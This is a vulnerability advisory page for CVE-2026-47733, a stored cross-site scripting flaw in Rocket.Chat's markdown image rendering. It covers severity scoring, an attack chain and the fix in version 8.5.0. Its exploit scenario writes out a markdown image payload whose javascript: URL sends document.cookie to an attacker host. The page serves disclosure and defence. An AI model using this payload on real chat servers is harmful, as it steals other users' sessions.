Skip to main content

Rocket.Chat CVE-2026-47733

| EUVDEUVD-2026-39089 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-24 security-advisories@github.com
4.4
CVSS 3.1 · Vendor: github
Share

Severity by source

Vendor (github) PRIMARY
4.4 MEDIUM
AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
4.4 MEDIUM

Network delivery with authenticated sender (PR:L), legacy-browser precondition raises complexity (AC:H), victim click mandatory (UI:R), cross-user session impact drives S:C with limited C/I.

3.1 AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (github).

CVSS VectorVendor: github

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Patch available
Jun 24, 2026 - 22:03 EUVD
Analysis Generated
Jun 24, 2026 - 21:43 vuln.today

DescriptionCVE.org

Rocket.Chat is an open-source, secure, fully customizable communications platform. Prior to 8.5.0, the ImageElement component in packages/gazzodown renders user-controlled src values directly into <a href> and <img src> attributes without protocol sanitization. Unlike the analogous LinkSpan component - which uses sanitizeUrl to block javascript:, data:, and vbscript: protocols - ImageElement passes the raw URL through unchanged. An authenticated user can post a markdown image with a javascript: URL that, if clicked on an older browser, would execute arbitrary JavaScript in the viewer's session. This vulnerability is fixed in 8.5.0.

AnalysisAI

Stored XSS in Rocket.Chat's Gazzodown Markdown renderer allows authenticated users to inject javascript: protocol URIs into image elements that execute arbitrary JavaScript in a victim's browser session upon click. The ImageElement component in versions prior to 8.5.0 omits the sanitizeUrl() guard applied by the analogous LinkSpan component, creating an inconsistency that bypasses javascript:, data:, and vbscript: protocol blocking. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker authenticates to Rocket.Chat instance
Delivery
Posts Markdown image with javascript: URI as src in shared channel
Exploit
Victim views message on legacy browser
Execution
Victim clicks rendered image link
Persist
JavaScript executes in victim's browser session
Impact
Session token or credentials exfiltrated to attacker

Vulnerability AssessmentAI

Exploitation Exploitation requires three simultaneous conditions: (1) The attacker must hold a valid authenticated Rocket.Chat account (PR:L) with permission to post messages containing Markdown image syntax in at least one shared channel or direct message thread. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The official CVSS 4.4 Medium score is consistent with the actual threat model. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated Rocket.Chat user posts a message containing a Markdown image with a javascript: URL as the src attribute, such as ![img](javascript:fetch('https://attacker.example/steal?c='+document.cookie)). A second user viewing the channel on a legacy browser clicks the rendered image, triggering JavaScript execution in their session and exfiltrating their session token to an attacker-controlled server. …
Remediation Vendor-released patch: Rocket.Chat 8.5.0, which applies equivalent protocol sanitization (sanitizeUrl) to the ImageElement component, closing the inconsistency with LinkSpan. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-47733 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy